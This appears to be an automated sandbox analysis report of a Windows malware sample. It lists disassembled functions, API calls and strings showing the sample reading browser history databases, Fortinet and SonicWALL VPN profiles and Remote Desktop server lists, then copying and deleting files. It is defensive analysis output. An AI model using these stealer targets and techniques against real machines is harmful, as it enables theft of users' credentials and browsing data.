                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1750269033-0
                                                                                                                            • Opcode ID: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                            • Instruction ID: f24121a38b8713f310a24284731861189f029925216073e93d03df4df7b981ac
                                                                                                                            • Opcode Fuzzy Hash: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                            • Instruction Fuzzy Hash: AF614D32B58A1695EB24AF69D4503AC73B0FB48B98F844432EF0D5BB68DF39D509C360
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                            • __memcpy.DELAYIMP ref: 00007FF7CBCAEF63
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0145
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0153
                                                                                                                              • Part of subcall function 00007FF7CBCAEB94: lstrlenA.KERNEL32 ref: 00007FF7CBCAEBB1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                            • String ID: last_visit_date$moz_places$table$url
                                                                                                                            • API String ID: 2336645791-66087218
                                                                                                                            • Opcode ID: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                            • Instruction ID: 3fe8002c2aa6b48fe906cba093c669dcb85d7c0b10ee194525471793428ac52d
                                                                                                                            • Opcode Fuzzy Hash: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                            • Instruction Fuzzy Hash: 9D31766260865241DE30AF2AA4901AAA750FB85BE0FC04532EF4D977A5EE7CD546C720
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                            • __memcpy.DELAYIMP ref: 00007FF7CBCAF18F
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0145
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0153
                                                                                                                              • Part of subcall function 00007FF7CBCAEB94: lstrlenA.KERNEL32 ref: 00007FF7CBCAEBB1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                            • String ID: last_visit_time$table$url$urls
                                                                                                                            • API String ID: 2336645791-3896411411
                                                                                                                            • Opcode ID: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                            • Instruction ID: 418d2e29a6a1f5572bb911d458a1f0c28042c39dcc09c0ec4ec9588864681fce
                                                                                                                            • Opcode Fuzzy Hash: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                            • Instruction Fuzzy Hash: E431636160C79281EE70EE2EE4501EAA750FB84BA0F808531EF9D877A6EF3CD545C720
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                            • __memcpy.DELAYIMP ref: 00007FF7CBCAED43
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0145
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0153
                                                                                                                              • Part of subcall function 00007FF7CBCAEB94: lstrlenA.KERNEL32 ref: 00007FF7CBCAEBB1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                            • String ID: last_visit_time$table$url$urls
                                                                                                                            • API String ID: 2336645791-3896411411
                                                                                                                            • Opcode ID: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                            • Instruction ID: 8ae440521657a4c1cdbe7de0dde9cfef882de36cea4fa0c2e7d90c1297c5cfb3
                                                                                                                            • Opcode Fuzzy Hash: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                            • Instruction Fuzzy Hash: BE31536260869345EF30AE2AA4501AAF750BB85BA0F904431EF4D47BA5EE3CD555C750
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AppendPathlstrcpy
                                                                                                                            • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                                            • API String ID: 3043196718-4231764533
                                                                                                                            • Opcode ID: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                            • Instruction ID: b7c672c18bd4f773f9c0932136f8b45aaf7ef2b8c9b943350211a2e6d6be3f30
                                                                                                                            • Opcode Fuzzy Hash: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                            • Instruction Fuzzy Hash: 94319E61654AA281DB20AF69E8442E9B365FB88BE0F944532FF5D077A9CF3CD504C710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: ?
• API String ID: 1818849710-1684325040
• Opcode ID: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
• Instruction ID: bb0c4077df1a6cc5451e933fa63c94025fb4ec515e44db7c5b6446156dd1b2cc
• Opcode Fuzzy Hash: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
• Instruction Fuzzy Hash: 1E21C773A147908EE7209F75A8402EDB7A4FB597A8B944225EB8C07B59DF3CC144CB10
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: HeapValue$AppendFreePathProcesslstrcpy
• String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
• API String ID: 784796242-1893226844
• Opcode ID: 56f71f68fbf130069fe557fb8e3a7c8bf433f458dc10dc9b1a9b8d1950a128cc
• Instruction ID: 4f65549979f6463c9b60bb3e22d97bf3ef3ed00229ad2a1ab00b18c8fb6df729
• Opcode Fuzzy Hash: 56f71f68fbf130069fe557fb8e3a7c8bf433f458dc10dc9b1a9b8d1950a128cc
• Instruction Fuzzy Hash: 75118E116486A240DA30BF69E8953FAE360EF84BE0F841531FB9D4B6BADE2CD104C710
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Enum$CloseOpen
• String ID:
• API String ID: 1701607978-0
• Opcode ID: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
• Instruction ID: f5cdc763a5b77a46ce58c44edc250efd76d136808dae1c1be8ec4184ae9e8fa4
• Opcode Fuzzy Hash: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
• Instruction Fuzzy Hash: 03216933618B9582D7208F15E48476AB7B4F788B84F540236EB8C43B28CF3DD559CB00
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Value$AppendPathlstrcpy
• String ID: Software\Microsoft\Terminal Server Client\Servers
• API String ID: 19203174-1233151749
• Opcode ID: 0d695f50cfbc54c939f23020370ed581918cd74b60817dfd48474a5e17f4269d
• Instruction ID: b7c4221d4cdb8c629e0419d663d44481bc8bf9d7e41ce2d1335963e4f561f03a
• Opcode Fuzzy Hash: 0d695f50cfbc54c939f23020370ed581918cd74b60817dfd48474a5e17f4269d
• Instruction Fuzzy Hash: 1621DF61628A9285DB30FF66D8502EEA360FB88BD0F840531FB5D4B7A9DE3CC604C710
APIs
• GetEnvironmentVariableW.KERNEL32 ref: 00007FF7CBCAFE11
• lstrcatW.KERNEL32 ref: 00007FF7CBCAFE1E
  • Part of subcall function 00007FF7CBCAFF3C: lstrlenW.KERNEL32 ref: 00007FF7CBCAFF62
  • Part of subcall function 00007FF7CBCAFF3C: lstrlenW.KERNEL32 ref: 00007FF7CBCAFF7E
  • Part of subcall function 00007FF7CBCAFF3C: WideCharToMultiByte.KERNEL32 ref: 00007FF7CBCAFFA7
  • Part of subcall function 00007FF7CBCAFF3C: PathFileExistsA.SHLWAPI ref: 00007FF7CBCAFFB0
  • Part of subcall function 00007FF7CBCAFF3C: OpenFile.KERNEL32 ref: 00007FF7CBCAFFC9
  • Part of subcall function 00007FF7CBCAFF3C: GetFileSize.KERNEL32 ref: 00007FF7CBCAFFE9
  • Part of subcall function 00007FF7CBCAFF3C: CreateFileMappingA.KERNEL32 ref: 00007FF7CBCB0020
  • Part of subcall function 00007FF7CBCAFF3C: MapViewOfFile.KERNEL32 ref: 00007FF7CBCB0041
  • Part of subcall function 00007FF7CBCAFF3C: __memcpy.DELAYIMP ref: 00007FF7CBCB0053
  • Part of subcall function 00007FF7CBCAFF3C: UnmapViewOfFile.KERNEL32 ref: 00007FF7CBCB005E
  • Part of subcall function 00007FF7CBCAFF3C: CloseHandle.KERNEL32 ref: 00007FF7CBCB0067
  • Part of subcall function 00007FF7CBCAFF3C: CloseHandle.KERNEL32 ref: 00007FF7CBCB0070
  • Part of subcall function 00007FF7CBCAF280: __memcpy.DELAYIMP ref: 00007FF7CBCAF29E
  • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
  • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
• String ID: APPDATA
• API String ID: 2395011915-4054820676
• Opcode ID: cec1ab9afa3ae12122d372c36ef716b8056693dd0c9b4a40219edd8f34d93ed0
• Instruction ID: 7f210e618221ce93b2fc6cad54b7190bb3be6df8277cfd831fe4efb0b1c1976d
• Opcode Fuzzy Hash: cec1ab9afa3ae12122d372c36ef716b8056693dd0c9b4a40219edd8f34d93ed0
• Instruction Fuzzy Hash: 07113A22628A5691EF20EF19E4445EEB361FB847A4FC44431FB8D87A69EF3CD509C760

Execution Graph

Execution Coverage: 3.7%
Dynamic/Decrypted Code Coverage: 47.8%
Signature Coverage: 3.6%
Total number of Nodes: 692
Total number of Limit Nodes: 83
27515->27506 27516 43199d 9 API calls 27518 432bdf StrStrIW 27516->27518 27519 432c10 StrStrIW 27518->27519 27522 432bf1 27518->27522 27519->27522 27520 431cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27520->27522 27521 431011 3 API calls 27521->27513 27522->27519 27522->27520 27522->27521 27531 43278e 41 API calls 27522->27531 27524 43199d 9 API calls 27524->27525 27525->27508 27525->27511 27525->27516 27525->27524 27526 431011 3 API calls 27525->27526 27527 4319b4 27525->27527 27526->27525 27528 4319bc 27527->27528 27530 4319d4 27527->27530 27529 4319c3 lstrlenW 27528->27529 27528->27530 27529->27530 27530->27525 27531->27519 28038 4484a7 29 API calls 28137 47c322 27 API calls 28042 439925 18 API calls 28138 43cb2a _allmul _allmul 28139 46072d 19 API calls 28043 440128 34 API calls 28044 449534 38 API calls 28045 45f130 22 API calls 28140 44ff32 21 API calls 28141 447b3d 18 API calls 28143 440f3e 58 API calls 28046 483dc8 24 API calls 28146 4673c4 22 API calls 27410 439fc8 27411 439fd3 27410->27411 27413 439fd8 27410->27413 27412 439ff4 HeapCreate 27412->27411 27414 43a004 27412->27414 27413->27411 27413->27412 27416 437f70 17 API calls 27414->27416 27416->27411 28149 4513ca 87 API calls 27532 4343d9 27539 434317 _alloca_probe RegOpenKeyW 27532->27539 27535 434317 25 API calls 27536 4343f5 27535->27536 27537 434317 25 API calls 27536->27537 27538 434403 27537->27538 27540 434343 RegEnumKeyExW 27539->27540 27541 4343cf 27539->27541 27542 4343c4 RegCloseKey 27540->27542 27544 43436d 27540->27544 27541->27535 27542->27541 27543 431953 6 API calls 27543->27544 27544->27543 27545 43199d 9 API calls 27544->27545 27547 431011 3 API calls 27544->27547 27550 43418a 16 API calls 27544->27550 27545->27544 27548 43439b RegEnumKeyExW 27547->27548 27548->27544 27549 4343c3 27548->27549 27549->27542 27550->27544 28152 43ebd9 35 API calls 27738 4315dd 27739 4315f3 lstrlen 27738->27739 27740 431600 27738->27740 27739->27740 27749 431000 GetProcessHeap 
RtlAllocateHeap 27740->27749 27742 431608 lstrcat 27743 431644 27742->27743 27744 43163d lstrcat 27742->27744 27750 431333 27743->27750 27744->27743 27747 431011 3 API calls 27748 431667 27747->27748 27749->27742 27773 431000 GetProcessHeap RtlAllocateHeap 27750->27773 27752 431357 27774 43106c lstrlen MultiByteToWideChar 27752->27774 27754 431366 27775 4312a3 RtlZeroMemory 27754->27775 27757 4313b8 RtlZeroMemory 27761 4313ed 27757->27761 27758 431011 3 API calls 27759 4315d2 27758->27759 27759->27747 27760 4315b5 27760->27758 27761->27760 27777 431000 GetProcessHeap RtlAllocateHeap 27761->27777 27763 4314a7 wsprintfW 27764 4314c9 27763->27764 27772 4315a1 27764->27772 27778 431000 GetProcessHeap RtlAllocateHeap 27764->27778 27765 431011 3 API calls 27765->27760 27767 431533 27768 43159a 27767->27768 27779 43104c VirtualAlloc 27767->27779 27769 431011 3 API calls 27768->27769 27769->27772 27771 43158a RtlMoveMemory 27771->27768 27772->27765 27773->27752 27774->27754 27776 4312c5 27775->27776 27776->27757 27776->27760 27777->27763 27778->27767 27779->27771 27780 4363dd 27782 43b87b 20 API calls 27780->27782 27781 4363f4 27782->27781 28049 4399e1 strncmp 28050 4855eb IsProcessorFeaturePresent 28053 43c9ea _allmul _alldiv 28054 4349f1 13 API calls 28055 43d1f7 memset _allmul _allmul 28154 449ff0 31 API calls 28155 4513ca 70 API calls 27873 4347fa 27880 43479c 27873->27880 27876 43479c 23 API calls 27877 434813 27876->27877 27878 43479c 23 API calls 27877->27878 27879 43481f 27878->27879 27881 431afe 10 API calls 27880->27881 27882 4347af 27881->27882 27883 4347f1 27882->27883 27884 43199d 9 API calls 27882->27884 27883->27876 27885 4347bf 27884->27885 27886 4347ea 27885->27886 27889 431d4a 27885->27889 27887 431011 3 API calls 27886->27887 27887->27883 27890 431d62 27889->27890 27891 431eb4 27889->27891 27890->27891 27892 4319b4 lstrlenW 27890->27892 27891->27885 27893 431d73 27892->27893 27894 431d8b 27893->27894 27895 431d79 27893->27895 27897 431953 6 API calls 
27894->27897 27896 431953 6 API calls 27895->27896 27898 431d83 27896->27898 27897->27898 27898->27891 27899 431da3 FindFirstFileW 27898->27899 27900 431ead 27899->27900 27907 431dba 27899->27907 27901 431011 3 API calls 27900->27901 27901->27891 27902 431dc5 lstrcmpiW 27904 431e8e FindNextFileW 27902->27904 27905 431ddd lstrcmpiW 27902->27905 27903 431953 6 API calls 27903->27907 27906 431ea2 FindClose 27904->27906 27904->27907 27905->27904 27908 431df5 27905->27908 27906->27900 27907->27902 27907->27903 27909 43199d 9 API calls 27907->27909 27910 4319b4 lstrlenW 27908->27910 27912 431011 3 API calls 27908->27912 27914 431953 6 API calls 27908->27914 27915 43199d 9 API calls 27908->27915 27916 431d4a 12 API calls 27908->27916 27917 431cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27908->27917 27911 431e54 lstrcmpiW 27909->27911 27910->27908 27911->27908 27912->27904 27914->27908 27915->27908 27916->27908 27917->27908 28056 457d8b _allrem memcpy 28161 4513ca 86 API calls 28058 44fd97 19 API calls 28163 44cb91 18 API calls 28164 43bf9a _alldiv 28059 431198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 27580 43639e 27584 43b1e3 27580->27584 27604 43b1e5 27580->27604 27581 4363b2 27585 43b1e5 27584->27585 27588 43b214 27585->27588 27638 43aeea 27585->27638 27587 43b233 27590 43b28f 27587->27590 27624 43a7ae 27587->27624 27588->27587 27588->27590 27656 43ae65 27588->27656 27590->27581 27592 43b26d 27662 43a1c6 18 API calls 27592->27662 27593 43b2d6 27635 436a5a 27593->27635 27599 43b310 CreateFileMappingW 27600 43b32b MapViewOfFile 27599->27600 27601 43b37e 27599->27601 27600->27601 27602 43b2e8 27600->27602 27663 43a1c6 18 API calls 27601->27663 27602->27590 27602->27599 27605 43b20d 27604->27605 27609 43b214 27604->27609 27606 43aeea 25 API calls 27605->27606 27606->27609 27607 43ae65 21 API calls 27610 43b233 27607->27610 27608 43b28f 27608->27581 27609->27607 27609->27608 27609->27610 27610->27608 27611 43a7ae 18 API calls 
27610->27611 27614 43b267 27611->27614 27612 43b26d 27735 43a1c6 18 API calls 27612->27735 27613 43b2d6 27615 436a5a 17 API calls 27613->27615 27614->27608 27614->27612 27614->27613 27617 43a67c 21 API calls 27614->27617 27622 43b2e8 27615->27622 27618 43b2be 27617->27618 27618->27612 27618->27613 27619 43b310 CreateFileMappingW 27620 43b32b MapViewOfFile 27619->27620 27621 43b37e 27619->27621 27620->27621 27620->27622 27736 43a1c6 18 API calls 27621->27736 27622->27608 27622->27619 27626 43a7c7 27624->27626 27625 43a805 27625->27590 27625->27592 27625->27593 27628 43a67c 27625->27628 27626->27625 27664 43a1c6 18 API calls 27626->27664 27629 43a6c1 27628->27629 27630 43a694 _alldiv _allmul 27628->27630 27665 43a33b SetFilePointer 27629->27665 27630->27629 27634 43a6ee 27634->27592 27634->27593 27636 48307c 17 API calls 27635->27636 27637 436a65 27636->27637 27637->27602 27671 436a81 27638->27671 27640 43af01 27641 436a81 memset 27640->27641 27655 43af07 27640->27655 27642 43af2a 27641->27642 27642->27655 27675 437f07 27642->27675 27645 43af54 27645->27655 27678 4852ae 27645->27678 27648 43affa 27649 43b020 27648->27649 27650 43b000 27648->27650 27651 43ae65 21 API calls 27649->27651 27701 43a1c6 18 API calls 27650->27701 27653 43b01c 27651->27653 27653->27655 27696 43adcc 27653->27696 27655->27588 27658 43ae7a 27656->27658 27657 43ae83 27657->27587 27658->27657 27659 43a67c 21 API calls 27658->27659 27660 43aea5 27659->27660 27660->27657 27734 43a1c6 18 API calls 27660->27734 27662->27590 27663->27590 27664->27625 27666 43a390 27665->27666 27667 43a36a 27665->27667 27666->27634 27669 43a1c6 18 API calls 27666->27669 27667->27666 27670 43a1c6 18 API calls 27667->27670 27669->27634 27670->27666 27672 436a8f 27671->27672 27673 436a95 memset 27672->27673 27674 436aa4 27672->27674 27673->27674 27674->27640 27702 437ec7 27675->27702 27679 4852bb 27678->27679 27680 43afd9 27679->27680 27707 46ba08 _allmul 27679->27707 27682 43b87b 27680->27682 27683 43b88d memset 
27682->27683 27685 43b8e5 27683->27685 27685->27683 27689 43ba14 27685->27689 27690 43ba41 27685->27690 27695 43ba3c 27685->27695 27708 43b609 27685->27708 27711 43b64b 18 API calls 27685->27711 27712 43bb9f 18 API calls 27685->27712 27713 43a2aa 17 API calls 27685->27713 27714 43a1c6 18 API calls 27689->27714 27694 4852ae _allmul 27690->27694 27692 43ba32 27715 484db2 17 API calls 27692->27715 27694->27695 27695->27648 27700 43ade4 27696->27700 27697 43ae5f 27697->27655 27700->27697 27720 43bafc 27700->27720 27731 43a39e 18 API calls 27700->27731 27701->27653 27703 437ed9 27702->27703 27704 437ed4 27702->27704 27706 436e6a 17 API calls 27703->27706 27704->27645 27706->27704 27707->27680 27716 43a08a 27708->27716 27710 43b60f 27710->27685 27711->27685 27712->27685 27713->27685 27714->27692 27715->27695 27717 43a0a4 27716->27717 27718 43a0aa 27717->27718 27719 436a81 memset 27717->27719 27718->27710 27719->27718 27721 43b609 memset 27720->27721 27727 43bb14 27721->27727 27722 43bb3f GetFileAttributesW 27723 43bb4b 27722->27723 27722->27727 27725 43bb5b 27723->27725 27726 43bb7d 27723->27726 27724 43bb25 DeleteFileW 27724->27726 27724->27727 27732 43a1c6 18 API calls 27725->27732 27733 43a2aa 17 API calls 27726->27733 27727->27722 27727->27724 27727->27725 27730 43bb1a 27727->27730 27730->27700 27731->27700 27732->27730 27733->27730 27734->27657 27735->27608 27736->27608 27783 431b9d 27784 431ba2 27783->27784 27785 431bc1 27783->27785 27784->27785 27786 431ba9 GetFileAttributesW 27784->27786 27787 431bb5 27786->27787 28165 458ba6 7 API calls 28060 4411a0 41 API calls 28166 4753ad memset memcpy memset memcpy 28167 4733b7 27 API calls 28063 459dbc 25 API calls 28168 4513ca 87 API calls

Control-flow Graph
• Function 00433717 (entry block 433717-433730, first call 00431B6A; exits through 433c15 DeleteFileW / 431011): basic-block edge list and Executed / Not Executed colouring are graph-viewer residue and are omitted.
APIs
  • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
  • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
• GetTempPathW.KERNEL32(00000104,00000000), ref: 00433778
• GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00433782
• DeleteFileW.KERNELBASE(00000000), ref: 00433789
• CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00433794
